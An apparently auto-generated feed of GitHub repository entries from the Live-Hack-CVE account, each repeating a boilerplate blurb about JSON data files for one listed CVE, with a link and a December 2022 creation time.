**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-23483 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-23483](https://github.com/Live-Hack-CVE/CVE-2022-23483) create time: 2022-12-23T02:22:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-23482 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-23482](https://github.com/Live-Hack-CVE/CVE-2022-23482) create time: 2022-12-23T02:22:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45514 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45514](https://github.com/Live-Hack-CVE/CVE-2022-45514) create time: 2022-12-23T02:22:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45513 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45513](https://github.com/Live-Hack-CVE/CVE-2022-45513) create time: 2022-12-23T02:22:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45512 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45512](https://github.com/Live-Hack-CVE/CVE-2022-45512) create time: 2022-12-23T02:22:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-23481 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-23481](https://github.com/Live-Hack-CVE/CVE-2022-23481) create time: 2022-12-23T02:22:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2003-1562 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2003-1562](https://github.com/Live-Hack-CVE/CVE-2003-1562) create time: 2022-12-23T01:04:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2003-0190 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2003-0190](https://github.com/Live-Hack-CVE/CVE-2003-0190) create time: 2022-12-23T01:04:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2010-1717 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2010-1717](https://github.com/Live-Hack-CVE/CVE-2010-1717) create time: 2022-12-23T00:26:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2010-4604 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2010-4604](https://github.com/Live-Hack-CVE/CVE-2010-4604) create time: 2022-12-22T23:47:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2010-4606 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2010-4606](https://github.com/Live-Hack-CVE/CVE-2010-4606) create time: 2022-12-22T23:47:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20124 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20124](https://github.com/Live-Hack-CVE/CVE-2022-20124) create time: 2022-12-23T00:25:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2012-1717 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2012-1717](https://github.com/Live-Hack-CVE/CVE-2012-1717) create time: 2022-12-23T00:24:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2012-3412 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2012-3412](https://github.com/Live-Hack-CVE/CVE-2012-3412) create time: 2022-12-23T00:24:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-0543 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-0543](https://github.com/Live-Hack-CVE/CVE-2013-0543) create time: 2022-12-22T23:48:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-0544 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-0544](https://github.com/Live-Hack-CVE/CVE-2013-0544) create time: 2022-12-22T23:48:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-8176 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-8176](https://github.com/Live-Hack-CVE/CVE-2014-8176) create time: 2022-12-23T00:29:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20144 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20144](https://github.com/Live-Hack-CVE/CVE-2022-20144) create time: 2022-12-23T00:23:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-4004 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-4004](https://github.com/Live-Hack-CVE/CVE-2015-4004) create time: 2022-12-23T01:07:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-0292 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-0292](https://github.com/Live-Hack-CVE/CVE-2015-0292) create time: 2022-12-23T01:04:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-0289 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-0289](https://github.com/Live-Hack-CVE/CVE-2015-0289) create time: 2022-12-23T01:04:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-0293 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-0293](https://github.com/Live-Hack-CVE/CVE-2015-0293) create time: 2022-12-23T01:04:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-0207 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-0207](https://github.com/Live-Hack-CVE/CVE-2015-0207) create time: 2022-12-23T01:04:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-0287 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-0287](https://github.com/Live-Hack-CVE/CVE-2015-0287) create time: 2022-12-23T01:04:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-0285 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-0285](https://github.com/Live-Hack-CVE/CVE-2015-0285) create time: 2022-12-23T00:34:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-0286 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-0286](https://github.com/Live-Hack-CVE/CVE-2015-0286) create time: 2022-12-23T00:34:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-0290 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-0290](https://github.com/Live-Hack-CVE/CVE-2015-0290) create time: 2022-12-23T00:33:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-0288 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-0288](https://github.com/Live-Hack-CVE/CVE-2015-0288) create time: 2022-12-23T00:33:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-0208 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-0208](https://github.com/Live-Hack-CVE/CVE-2015-0208) create time: 2022-12-23T00:33:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-0209 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-0209](https://github.com/Live-Hack-CVE/CVE-2015-0209) create time: 2022-12-23T00:33:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-0291 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-0291](https://github.com/Live-Hack-CVE/CVE-2015-0291) create time: 2022-12-23T00:32:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-1789 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-1789](https://github.com/Live-Hack-CVE/CVE-2015-1789) create time: 2022-12-23T00:32:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-1792 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-1792](https://github.com/Live-Hack-CVE/CVE-2015-1792) create time: 2022-12-23T00:32:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-1788 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-1788](https://github.com/Live-Hack-CVE/CVE-2015-1788) create time: 2022-12-23T00:32:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-1794 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-1794](https://github.com/Live-Hack-CVE/CVE-2015-1794) create time: 2022-12-23T00:32:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-1791 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-1791](https://github.com/Live-Hack-CVE/CVE-2015-1791) create time: 2022-12-23T00:32:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-1790 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-1790](https://github.com/Live-Hack-CVE/CVE-2015-1790) create time: 2022-12-23T00:32:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-1787 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-1787](https://github.com/Live-Hack-CVE/CVE-2015-1787) create time: 2022-12-23T00:32:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-3195 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-3195](https://github.com/Live-Hack-CVE/CVE-2015-3195) create time: 2022-12-23T00:32:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-3197 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-3197](https://github.com/Live-Hack-CVE/CVE-2015-3197) create time: 2022-12-23T00:31:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-3193 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-3193](https://github.com/Live-Hack-CVE/CVE-2015-3193) create time: 2022-12-23T00:31:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-3196 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-3196](https://github.com/Live-Hack-CVE/CVE-2015-3196) create time: 2022-12-23T00:31:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-5352 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-5352](https://github.com/Live-Hack-CVE/CVE-2015-5352) create time: 2022-12-23T00:30:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-3194 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-3194](https://github.com/Live-Hack-CVE/CVE-2015-3194) create time: 2022-12-23T00:30:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-5600 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-5600](https://github.com/Live-Hack-CVE/CVE-2015-5600) create time: 2022-12-23T00:30:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-4000 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-4000](https://github.com/Live-Hack-CVE/CVE-2015-4000) create time: 2022-12-23T00:30:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-6574 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-6574](https://github.com/Live-Hack-CVE/CVE-2015-6574) create time: 2022-12-23T00:30:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-6565 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-6565](https://github.com/Live-Hack-CVE/CVE-2015-6565) create time: 2022-12-23T00:30:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-0371 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-0371](https://github.com/Live-Hack-CVE/CVE-2016-0371) create time: 2022-12-23T01:06:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-0704 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-0704](https://github.com/Live-Hack-CVE/CVE-2016-0704) create time: 2022-12-23T01:04:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-0701 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-0701](https://github.com/Live-Hack-CVE/CVE-2016-0701) create time: 2022-12-23T01:04:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-0705 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-0705](https://github.com/Live-Hack-CVE/CVE-2016-0705) create time: 2022-12-23T00:33:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-0702 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-0702](https://github.com/Live-Hack-CVE/CVE-2016-0702) create time: 2022-12-23T00:33:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-0703 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-0703](https://github.com/Live-Hack-CVE/CVE-2016-0703) create time: 2022-12-23T00:33:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-0799 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-0799](https://github.com/Live-Hack-CVE/CVE-2016-0799) create time: 2022-12-23T00:33:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-0798 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-0798](https://github.com/Live-Hack-CVE/CVE-2016-0798) create time: 2022-12-23T00:33:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-10009 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-10009](https://github.com/Live-Hack-CVE/CVE-2016-10009) create time: 2022-12-23T00:33:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-0778 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-0778](https://github.com/Live-Hack-CVE/CVE-2016-0778) create time: 2022-12-23T00:33:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-0797 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-0797](https://github.com/Live-Hack-CVE/CVE-2016-0797) create time: 2022-12-23T00:33:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-10011 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-10011](https://github.com/Live-Hack-CVE/CVE-2016-10011) create time: 2022-12-23T00:32:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-0777 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-0777](https://github.com/Live-Hack-CVE/CVE-2016-0777) create time: 2022-12-23T00:32:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-10010 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-10010](https://github.com/Live-Hack-CVE/CVE-2016-10010) create time: 2022-12-23T00:32:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-0800 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-0800](https://github.com/Live-Hack-CVE/CVE-2016-0800) create time: 2022-12-23T00:32:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-10012 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-10012](https://github.com/Live-Hack-CVE/CVE-2016-10012) create time: 2022-12-23T00:32:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-2105 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-2105](https://github.com/Live-Hack-CVE/CVE-2016-2105) create time: 2022-12-23T00:32:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-2180 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-2180](https://github.com/Live-Hack-CVE/CVE-2016-2180) create time: 2022-12-23T00:31:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-2177 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-2177](https://github.com/Live-Hack-CVE/CVE-2016-2177) create time: 2022-12-23T00:31:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-1907 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-1907](https://github.com/Live-Hack-CVE/CVE-2016-1907) create time: 2022-12-23T00:31:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-2178 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-2178](https://github.com/Live-Hack-CVE/CVE-2016-2178) create time: 2022-12-23T00:31:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-2182 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-2182](https://github.com/Live-Hack-CVE/CVE-2016-2182) create time: 2022-12-23T00:31:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-2107 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-2107](https://github.com/Live-Hack-CVE/CVE-2016-2107) create time: 2022-12-23T00:31:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-2108 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-2108](https://github.com/Live-Hack-CVE/CVE-2016-2108) create time: 2022-12-23T00:31:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-2181 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-2181](https://github.com/Live-Hack-CVE/CVE-2016-2181) create time: 2022-12-23T00:31:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-1908 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-1908](https://github.com/Live-Hack-CVE/CVE-2016-1908) create time: 2022-12-23T00:31:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-2109 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-2109](https://github.com/Live-Hack-CVE/CVE-2016-2109) create time: 2022-12-23T00:30:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-2176 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-2176](https://github.com/Live-Hack-CVE/CVE-2016-2176) create time: 2022-12-23T00:30:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-2179 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-2179](https://github.com/Live-Hack-CVE/CVE-2016-2179) create time: 2022-12-23T00:30:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-2106 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-2106](https://github.com/Live-Hack-CVE/CVE-2016-2106) create time: 2022-12-23T00:30:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-15906 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-15906](https://github.com/Live-Hack-CVE/CVE-2017-15906) create time: 2022-12-23T00:30:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-3735 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-3735](https://github.com/Live-Hack-CVE/CVE-2017-3735) create time: 2022-12-23T00:29:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-12112 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-12112](https://github.com/Live-Hack-CVE/CVE-2017-12112) create time: 2022-12-22T23:44:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-12113 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-12113](https://github.com/Live-Hack-CVE/CVE-2017-12113) create time: 2022-12-22T23:44:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-12114 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-12114](https://github.com/Live-Hack-CVE/CVE-2017-12114) create time: 2022-12-22T23:44:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-12115 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-12115](https://github.com/Live-Hack-CVE/CVE-2017-12115) create time: 2022-12-22T23:43:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-12116 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-12116](https://github.com/Live-Hack-CVE/CVE-2017-12116) create time: 2022-12-22T23:43:40Z

